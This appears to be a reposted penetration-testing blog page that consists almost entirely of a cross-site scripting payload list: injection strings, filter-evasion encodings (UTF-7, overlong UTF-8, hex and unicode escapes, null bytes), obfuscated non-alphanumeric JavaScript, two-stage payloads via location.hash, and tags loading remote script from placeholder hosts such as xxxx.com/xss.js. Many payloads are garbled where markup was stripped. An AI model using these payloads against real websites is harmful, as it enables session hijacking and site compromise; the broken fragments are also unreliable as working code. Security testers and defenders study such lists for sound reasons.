Cross-Site Scripting (XSS) Payloads – Penetration Testing

Collection of Cross-Site Scripting (XSS) Payloads

>

;!–“=&{()}”

alert(“XSS”)”>

perl -e ‘print ““;’ > out

<alert(“XSS”);//<

\”;alert(‘XSS’);//

<IMG id=XSS SRC='javascript:alert('XSS')

alert(/XSS/.source)

alert(“XSS”);

@im\port’\ja\vasc\ript:alert(“XSS”)’;

alert(‘XSS’);

.XSS{background-image:url(“javascript:alert(‘XSS’)”);}

BODY{background:url(“javascript:alert(‘XSS’)”)}

a=”get”;b=”URL(\””;c=”javascript:”;d=”alert(‘XSS’);\”)”;eval(a+b+c+d);

<![CDATA[]]>

<IMG id=XSS SRC="javascript:alert(‘XSS’)”>

<t:set attributeName="innerHTML" to="XSSalert(“XSS”)”>

<? echo('alert(“XSS”)’); ?>

<META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”>

http://127.0.0.1

//–>”>’>alert(String.fromCharCode(88,83,83))

<SCRIPT =alert(‘XSS’);”>

<IFRAME id=XSS SRC="javascript:alert('XSS'); <

a=/XSS/nalert(‘XSS’);

li {list-style-image: url(“javascript:alert(‘XSS’);

  • XSS

    +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-

    ,

    &alert(‘XSS’);”>

    <a id=XSS href="about:alert(‘XSS’);”>

    <!–alert(‘XSS’);//–>

    ![CDATA[<!–]]alert(‘XSS’);//–>

    alert(‘XSS’);

    “onmouseover=”alert(‘XSS’);”>

    alert(‘XSS’);;

    [\xC0][\xBC]script>alert(‘XSS’);[\xC0][\xBC]/script>

    <![CDATA[<IMG id=XSS SRC="javas]]]]

    X

    <video id=XSS poster=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))//

    <iframe id=XSS onload=alert(/XSS/)>
    <iframe id=XSS onload=alert(/XSS/)>

    ” onfocus=alert(XSS) “>
    ” onclick=alert(XSS) “>

    li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}

    • XSS
      ‘”>alert(XSS)

      ‘””> alert(‘X \nS \nS’);

      <<<>>><<alert(XSS)

      (XSS)(XSS)

      ‘>alert(XSS)

      }a=eval;b=alert;a(b(/XSS/.source));

      document.write(“XSS”);

      a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);

      =’>alert(“xss”)

      alert(XSS)>

      data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

      alert(‘XSS’);
      ”;!–“=&{()}
      http://xxxx.com/xss.js






      id=XSS SRC=







      http://xxxx.com/xss.js
      <SCRIPT id=XSS SRC=http://xxxx.com/xss.js?
      <IMG id=XSS SRC="javascript:alert('XSS')"
      a=/XSS/
      \”;alert(‘XSS’);//


      @import’http://xxxx.com/xss.css&#8217;;
      <META HTTP-EQUIV="Link" Content="; REL=stylesheet”>
      BODY{-moz-binding:url(“http://ift.tt/2vUxMLk&#8221;)}


      <META HTTP-EQUIV="Link" Content="; REL=stylesheet”>

      @im\port’\ja\vasc\ript:alert(“XSS”)’;

      exp/*<XSS STYLE='no\xss:noxss("*//*");
      alert(‘XSS’);
      .XSS{background-image:url(“javascript:alert(‘XSS’)”);}
      BODY{background:url(“javascript:alert(‘XSS’)”)}

      getURL(“javascript:alert(‘XSS’)”)
      a=”get”;
      <!–<![CDATA[<![CDATA[<IMG id=XSS SRC="javas

      <!–#exec cmd="/bin/echo '‘”–>
      <? echo('<SCR)';
      <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”>
      +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
      http://xxxx.com/xss.js
      http://xxxx.com/xss.js
      ‘” id=XSS SRC=”http://xxxx.com/xss.js”&gt;
      ` id=XSS SRC=”http://xxxx.com/xss.js”&gt;
      document.write(“<SCRI");PT id=XSS SRC=”http://xxxx.com/xss.js”&gt;

      alert(1)

      Null-byte character between HTML attribute name and equal sign (IE, Safari).

      Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).

      Vertical tab between HTML attribute name and equal sign (IE, Safari).

      Null-byte character between equal sign and JavaScript code (IE).

      Null-byte character between characters of HTML attribute names (IE).

      Null-byte character before characters of HTML element names (IE).

      Null-byte character after characters of HTML element names (IE, Safari).
      alert(1)

      Null-byte character between characters of HTML element names (IE).

      Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).

      Use vertical tabs instead of whitespace (IE, Safari).

      Use quotes instead of whitespace in some situations (Safari).

      Use null-bytes instead of whitespaces in some situations (IE).

      Just don’t use spaces (IE, Firefox, Chrome, Safari).

      Prefix URI schemes.
      Firefox (\x09, \x0a, \x0d, \x20)
      Chrome (Any character \x01 to \x20)

      No greater-than characters needed (IE, Firefox, Chrome, Safari).
      <img src='1' onerror='alert(0)' <

      Extra less-than characters (IE, Firefox, Chrome, Safari).
      <alert(0)

      Backslash character between expression and opening parenthesis (IE).
      body{background-color:expression\(alert(1))}

      JavaScript Escaping
      document.write(‘blah‘);

      Encoding Galore.

      HTML Attribute Encoding



      URL Encoding

      CSS Hexadecimal Encoding (IE specific examples)

      Joker
      Joker
      Joker
      Joker

      JavaScript (hexadecimal, octal, and unicode)
      document.write(‘‘);
      document.write(‘\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E’);
      document.write(‘\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076’);
      document.write(‘\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E’);

      JavaScript (Decimal char codes)
      document.write(‘‘);
      document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));

      JavaScript (Unicode function and variable names)
      alert(123)
      \u0061\u006C\u0065\u0072\u0074(123)

      Overlong UTF-8 (SiteMinder is awesome!)
      = %C0%BE = %E0%80%BE = %F0%80%80%BE
      ‘ = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
      ” = %C0%A2 = %E0%80%A2 = %F0%80%80%A2


      %E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE

      UTF-7 (Missing charset?)

      +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

      Unicode .NET Ugliness
      alert(1)
      %uff1cscript%uff1ealert(1)%uff1c/script%uff1e

      Classic ASP performs some unicode homoglyphic translations… don’t ask why…

      %u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

      Useless and/or Useful features.

      HTML 5 (Not comphrensive)

      Usuage of non-existent elements (IE)

      CSS Comments (IE)

      Alternate ways of executing JavaScript functions
      window[‘alert’](0)
      parent[‘alert’](1)
      self[‘alert’](2)
      top[‘alert’](3)

      Split up JavaScript into HTML attributes
      al

      HTML is parsed before JavaScript

      var junk = ‘alert(1)’;

      HTML is parsed before CSS

      body { background-image:url(‘http://www.blah.com/alert(1)&#8217;); }

      XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).

      URI Schemes

      (IE)
      <iframe src="data:text/html,alert(0)”> (Firefox, Chrome, Safari)
      (Firefox, Chrome, Safari)

      HTTP Parameter Pollution
      http://ift.tt/2qYc2vH
      ASP.NET a = val1,val2
      ASP a = val1,val2
      JSP a = val1
      PHP a = val2

      Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
      eval(location.hash.slice(1))
      eval(location.hash) (Firefox)

      http://ift.tt/2piuu5Weval(location.hash.slice(1))#alert(1)

      Two Stage XSS via name attribute
      <iframe src="http://ift.tt/2piuu5Weval(name)&#8221; name=”alert(1)”>

      Non-alphanumeric crazyness…

      $=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+””)[$],_$_:++$,$_$$:({}+””)[$],$$_$:($[$]+””)[$],_$$:++$,$$$_:(!””+””)[$],$__:++$,$_$:++$,$$__:({}+””)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+””)[$.__$])+((!$)+””)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!””+””)[$.__$])+($._=(!””+””)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!””+””)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+”\””+$.$_$_+(![]+””)[$._$_]+$.$$$_+”\\”+$.__$+$.$$_+$._$_+$.__+”(“+$.___+”)”+”\””)())();

      (+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()









      <img src=N onerror=eval(javascript:document.write(unescape(' http://domain.js‘));)>

      The post Cross-Site Scripting (XSS) Payloads appeared first on Penetration Testing.

      http://ift.tt/2vUlHpA http://ift.tt/2aM8QhC

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s